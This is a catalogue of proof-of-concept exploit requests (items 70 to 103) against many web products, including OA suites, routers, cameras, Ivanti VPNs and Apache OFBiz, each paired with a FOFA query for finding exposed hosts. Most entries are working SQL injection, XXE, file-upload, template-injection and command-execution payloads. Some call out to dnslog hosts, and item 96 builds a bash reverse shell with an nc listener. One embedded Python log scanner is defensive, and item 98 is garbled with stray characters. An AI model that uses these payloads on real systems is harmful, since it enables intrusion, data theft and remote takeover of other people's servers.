70. 万户 ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD


71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. 致远 OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x


76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}


GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x


77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--


GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE 百为 flow-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>


GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}


85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is shown below; it injects a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. tosei (Japan) self-service washing machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--


/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close


/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+


90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD


93. 奇安信 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. Qi An Xin NetGod (奇安信网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the uploaded file (the filename given in the upfile part) from /attachements/:
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the ysoserial payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated base64 into the <serializable> element of the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 ProgramExport groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell: start a listener on the attacking (Kali) host
nc -lvp 7777

then submit a groovy program that runs a base64-encoded bash one-liner:
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

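Both OFBiz entries (95 and 96) ride on the same weakness: a request to a /webtools/control/ view that carries requirePasswordChange=Y with an empty or absent USERNAME/PASSWORD is treated as logged in, which is what puts the xmlrpc deserialization and the ProgramExport groovy sink within reach of an unauthenticated client. The Python below is an added example for defenders (not from the original post or the OFBiz project) that pulls this pattern out of access-log request lines; the log lines, IP addresses and timestamps are constructed here.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined-log style); the first two
# reproduce the request lines of the xmlrpc and ProgramExport POCs above.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Jan/2024:10:00:01 +0000] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 512
203.0.113.5 - - [07/Jan/2024:10:00:07 +0000] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 1200
198.51.100.9 - - [07/Jan/2024:10:01:00 +0000] "GET /webtools/control/main HTTP/1.1" 200 3400
198.51.100.9 - - [07/Jan/2024:10:01:30 +0000] "POST /webtools/control/login?USERNAME=alice&PASSWORD=secret&requirePasswordChange=Y HTTP/1.1" 302 0
198.51.100.9 - - [07/Jan/2024:10:02:00 +0000] "POST /webtools/control/xmlrpc HTTP/1.1" 401 90
"""

REQ_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Views the two POCs reach once the bypass has succeeded.
RCE_SINKS = {"xmlrpc", "ProgramExport"}


def analyse_target(target: str) -> dict:
    """Classify one request target taken from the request line.

    Bypass shape: a /webtools/control/ path, requirePasswordChange=Y, and a
    USERNAME that is absent, bare ("USERNAME") or empty ("USERNAME=").
    """
    parts = urlsplit(target)
    # ";/" after the view name is the path-parameter trick from the xmlrpc POC;
    # cut it off before extracting the view name.
    clean_path = unquote(parts.path).split(";", 1)[0].rstrip("/")
    view = clean_path.rsplit("/", 1)[-1]
    # keep_blank_values=True keeps both "USERNAME=" and a bare "USERNAME" as "".
    params = parse_qs(parts.query, keep_blank_values=True)
    force_change = params.get("requirePasswordChange", [""])[0].upper() == "Y"
    username = params.get("USERNAME", [""])[0]
    return {
        "controller": parts.path.startswith("/webtools/control/"),
        "view": view,
        "bypass_attempt": force_change and username == "",
        "rce_sink": view in RCE_SINKS,
    }


def scan_log(text: str) -> list:
    """Return [(client_ip, target, reason)] for request lines matching the bypass."""
    hits = []
    for line in text.splitlines():
        m = REQ_LINE.search(line)
        if not m:
            continue
        info = analyse_target(m.group("target"))
        if not (info["controller"] and info["bypass_attempt"]):
            continue
        reason = "auth bypass -> " + info["view"]
        if info["rce_sink"]:
            reason += " (known RCE sink)"
        hits.append((line.split(" ", 1)[0], m.group("target"), reason))
    return hits


if __name__ == "__main__":
    for ip, target, reason in scan_log(SAMPLE_LOG):
        print(ip, reason, target)
```

A genuine forced password change (fourth line) carries real credentials and is not flagged; the two POC lines are. Because both POCs execute code on the first request, a hit on xmlrpc or ProgramExport is better handled as a possible compromise than as a scan.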
97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow爬虫平台远程命令执行9 e7 O1 g( q2 |
CVE-2024-0195
) z9 {* Z$ E- F8 wFOFA:app="SpiderFlow"2 ^1 S( M1 R( `2 d3 W- L5 y# L2 a. v
POST /function/save HTTP/1.1
. m9 o. z, @. y* lHost: 192.168.40.130:8088% A* U2 f5 S! h3 r* X) f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 L7 m) @: V0 d, }$ ]8 T+ KConnection: close
) Y) }! f5 @6 u+ w0 y/ UContent-Length: 121$ p: }5 I" }1 P" Y0 v$ S
Accept: */*
8 B, H. w9 l: M  x$ E0 ZAccept-Encoding: gzip, deflate# c8 ]2 i$ |: ]- Q% h" ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& x0 l- K' ^+ V% o/ M! Z. bContent-Type: application/x-www-form-urlencoded; charset=UTF-8
7 K3 p0 l( m* FX-Requested-With: XMLHttpRequest
) f" F  N8 K" z( B4 x. J5 H
( M; v9 Z' b/ V  rid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
; [0 \! ]7 N; z# }  [- N0 B- i7 C0 H$ u0 q1 {& o. u+ J2 m

99. Ncast (盈可视) HD intelligent recording system busiFacade.php RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

The outbound request is triggered by the ds:RetrievalMethod URI, which the SAML component fetches while resolving KeyInfo; the dnslog callback confirms the SSRF.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML, whose DOCTYPE declares an external parameter entity pointing at the dnslog host:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
